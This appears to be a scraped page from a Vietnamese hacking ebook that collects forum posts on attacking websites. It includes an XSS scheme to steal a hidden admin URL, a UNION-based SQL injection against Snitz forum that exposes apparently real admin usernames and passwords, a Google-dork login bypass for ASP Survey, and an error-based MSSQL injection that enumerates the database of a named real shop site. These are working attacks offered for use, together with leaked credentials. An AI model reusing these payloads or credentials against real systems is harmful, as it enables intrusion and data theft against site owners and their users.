Tải bản đầy đủ (.pdf) (6 trang)

Hacker Professional Ebook part 228 potx

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (144.95 KB, 6 trang )

acunetix hay các tools khác scan cấu trúc wếbit chỉ đơn giản là lần theo các link
trên 1 site và kiểm tra các link đó có 'sông' ko. từ đó hình thành ra cấu trúc
website > phần lớn ko scan đc link admin trừ khi link đó hiện hữu khi bạn duyệt
site đó. tất nhiên các tốl kiểu thế bi h cũng có sẵn 1 thư viện các link admin thường
có(/admin/,/login/,/manage/ chẳng hạn) rồi tốl k/tra xem link đó có hoạt động ko.
thế thôi :|
về nguyên tắc là phải đoán hết bạn a.
ngoài ra :-? cùng còn nh` cách khác nhưng khá khó thực hiện
rek ví dụ ra 1 kịch bản nhé
có 1 site ẩn link admin, forum đó có 1 phần news và members đc quyền submit,
nhưng trc khi news sbumittted by users đc đăng lên site, nó cần đc approve by
admin, bất ngờ thay có 1 bug XSS ở đó X))) và bạn submit 1 cái news exploit, khi
admin view news đó, nó tự forward đến 1 page bạn tao sẵn. page đó lưu lại referer
(chính là link admin) rồi lại forward admin về admin control panel X))) thế.
mọi chuyện đều có thể xảy ra.
ngoài ra cũng có trường hợp link admin nằm trong cả database X))) quan trọng là
phải tỉnh táo phân tích + hành động.
chúc thành công.

Rekcor(vniss)




Khai thác lổi SQL injection ở Snitz 2000 v.3.3.03, by tsbeginnervn

By Elite Members of Attack Team :: MATRIX 2K Hackers Association @2003-
2004
Sản phẩm:Snitz forum
Phiên bản:Snitz 2000 v.3.3.03
Nơi cung cấp:


Lổi:Sql injection
Nguy hiểm:Cao
Tác giả:©MATRIX 2K Attack Tem
=======================
Sơ lược:

Snitz forum là một forum phổ biên trên net nhưng không vì thế mà không có lổi
chúng ta thử nhìn code của file: pop_mail.asp
=======================
strSql = "SELECT M.M_EMAIL, M.M_NAME FROM " &
strMemberTablePrefix & "MEMBERS M"
strSql = strSql & " WHERE M.MEMBER_ID = " & Request.QueryString("ID")
=======================
Nguy hiểm nằm ở chổ tôi bôi màu đỏ ta thử xem xét có làm được gì không nhé

Nếu url có dạng /pop_mail.asp?ID=1 thì câu truy vấn có dạng:
Trích:
SELECT M.M_EMAIL, M.M_NAME FROM FORUM_TABLE.MEMBERS M
WHERE M.MEMBER_ID = 1
Ta thử khai thác như thế nào:
Code:
/pop_mail.asp?ID=1 UNION SELECT 1,M.M_NAME+'/'+M.M_PASSWORD
FROM FORUM_MEMBERS M WHERE M.MEMBER_ID = 1
Encode có dạng:
Code:
/pop_mail.asp?ID=1%20UNION%20SELECT%201%2cM.M_NAME%2b%27/
%27%2bM.M_PASSWORD%20FROM%20FORUM_MEMBERS%20M%20WH
ERE%20M.MEMBER_ID%20=%201
Thì câu truy vấn trở thành:
Code:

SELECT M.M_EMAIL, M.M_NAME FROM FORUM_TABLE.MEMBERS M
WHERE M.MEMBER_ID = 1UNION SELECT
1,M.M_NAME+'/'+M.M_PASSWORD FROM FORUM_MEMBERS M WHERE
M.MEMBER_ID = 1
và trả về cho ta username và password của thành viên số 1

Chú ý : với lệnh UNION, để trả về được kết quả số cột trong câu lệnh 1 fải đúng
bằng số cột trong câu lệnh 2, nếu ta có SELECT M.M_EMAIL, M.M_NAME thì
câu lệnh 2 phải là SELECT 1,M.M_NAME+'/'+M.M_PASSWORD khi đó số một
(1 ) sẽ thay cho 1 cột mặc định và luôn true, kết quả tên và password được union
với M_NAME và trả ra màn hình.

Test trên site:
/>1,M.M_NAME%2b
'/'%2bM.M_PASSWORD%20FROM%20FORUM_MEMBERS%20M%20WHER
E%20M.MEMBER_ID%20=%201
Kết quả:
Trích:
Send an EMAIL Message

Click to send Admin/g02a1z79 an email

Close Window
user:admin
pass:g02a1z79
/>T%201,M.M_NAME%2b
'/'%2bM.M_PASSWORD%20FROM%20FORUM_MEMBERS%20M%20WHER
E%20M.MEMBER_ID%20=%201
Kết quả:
Trích:

Send an EMAIL Message

Click to send AXOSADMIN/CAMBRIDGE an email

Close Window
user:AXOSADMIN
pass:CAMBRIDGE

Neo(VNISS)
sql injection ở ASP Survey

Thể loại : by pass
Sp : ASP Survey
Ngày công bố : 04/02/2006
Mô tả : Một lỗi đơn giản và dễ khai thác, rất phù hợp để cho những ai tập Hack có
cơ hội để thực hành.

Thực hiện :

1. Tìm kiếm trên google với từ khóa : allinurl:"login.asp" ASPsurvey
2. nếu may mắn bạn có thể login : với user và
password sau :
User : admin
Password : 'or'
3. Demo :

dmin/Login.asp

và còn nhiều site khác .
Neo(VNISS)

Hướng dẫn SQL injection trong shop.leadtools.com

Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)
May 3 2005 23:18:38
Copyright (c) 1988-2003 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
/LEADDB/shop.leadtools.com/shopuser
Code:
and
1=convert(int,@@version) sp_password
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the
nvarchar value 'Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005
23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on
Windows NT 5.2 (Build 3790: Service Pack 1) ' to a column of data type int
(Lấy thông tin của server)

Server name :'LEADDB'
Code:
and
1=convert(int,@@servername) sp_password


DB Name : 'shop.leadtools.com'
Code:
and
1=convert(int,db_name()) sp_password


System user : 'shopuser'


Domain Admin
p?catalogID=54 and 1=convert(int,(select
top 1 name from master sysusers where roles=0x01 and name not in('dbo')))
sp_password






Code:
and
1=convert(int,(select top 1 table_name from information_schema.tables))
sp_password
=>Dò table name đầu tiên đc. KQ là affiliatelog
Code:
and
1=convert(int,(select top 1 table_name from information_schema.tables where
table_name not in
('affiliatelog','coupons','customerprices','customers','affiliates','billing','categories','c
onfiguration','configuration1','DownloadHistory','downloads','dtproperties','gifts','h
ackers'))) sp_password
Dò các table khác qua toán tử not in cứ thế thêm vào các table đến khi nó 0 trả lại
giá trị nào nữa

Ta đc. các table :
Danh sach cac bang
affiliatelog
affiliates
billing

categories
configuration
configuration1
coupons
customerprices
customers
DownloadHistory

×